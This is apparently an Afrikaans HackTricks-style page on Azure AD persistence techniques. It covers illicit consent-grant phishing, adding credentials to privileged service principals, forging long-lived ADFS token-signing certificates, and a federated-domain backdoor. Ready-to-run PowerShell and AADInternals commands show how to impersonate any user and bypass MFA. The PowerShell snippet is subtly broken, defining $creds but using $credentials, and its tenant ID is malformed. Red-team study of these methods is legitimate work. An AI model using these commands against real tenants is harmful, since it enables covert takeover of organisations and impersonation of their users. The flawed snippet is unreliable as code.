Az - Persistensie
{{#include ../../../banners/hacktricks-training.md}}
Onwettige Toestemmingstoekenning
Standaard kan enige gebruiker 'n toepassing in Azure AD registreer. So kan jy 'n toepassing registreer (slegs vir die teikenhuurder) wat hoë impak toestemmings benodig met administratortoestemming (goedkeur dit as jy die admin is) - soos om e-pos namens 'n gebruiker te stuur, rolbestuur, ens. Dit sal ons in staat stel om phishing-aanvalle uit te voer wat baie vrugbaar sal wees in geval van sukses.
Boonop kan jy ook daardie toepassing met jou gebruiker aanvaar as 'n manier om toegang daaroor te behou.
Toepassings en Diensbeginsels
Met voorregte van Toepassing Administrateur, GA of 'n pasgemaakte rol met microsoft.directory/applications/credentials/update toestemmings, kan ons kredensiale (geheime of sertifikaat) aan 'n bestaande toepassing voeg.
Dit is moontlik om 'n toepassing met hoë toestemmings te teiken of 'n nuwe toepassing met hoë toestemmings toe te voeg.
'n Interessante rol om by die toepassing te voeg, sou die Privileged authentication administrator role wees, aangesien dit toelaat om die wagwoord van Globale Administrators te herstel.
Hierdie tegniek laat ook toe om MFA te omseil.
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
- Vir sertifikaat-gebaseerde outentisering
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
Federasie - Token Onderteken Sertifikaat
Met DA bevoegdhede op on-prem AD, is dit moontlik om nuwe Token onderteken en Token Decrypt sertifikate te skep en in te voer wat 'n baie lang geldigheid het. Dit sal ons in staat stel om in te teken as enige gebruiker wie se ImuutableID ons ken.
Voer die onderstaande opdrag uit as DA op die ADFS bediener(s) om nuwe sertifikate te skep (standaard wagwoord 'AADInternals'), voeg dit by ADFS, deaktiveer outomatiese hernuwing en herbegin die diens:
New-AADIntADFSSelfSignedCertificates
Dan, werk die sertifikaatinligting by met Azure AD:
Update-AADIntADFSFederationSettings -Domain cyberranges.io
Federasie - Betroubare Domein
Met GA-privileges op 'n huurder, is dit moontlik om 'n nuwe domein toe te voeg (moet geverifieer word), sy autentikasietipe na Federated te konfigureer en die domein te vertrou op 'n spesifieke sertifikaat (any.sts in die onderstaande opdrag) en uitreiker:
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
Verwysings
{{#include ../../../banners/hacktricks-training.md}}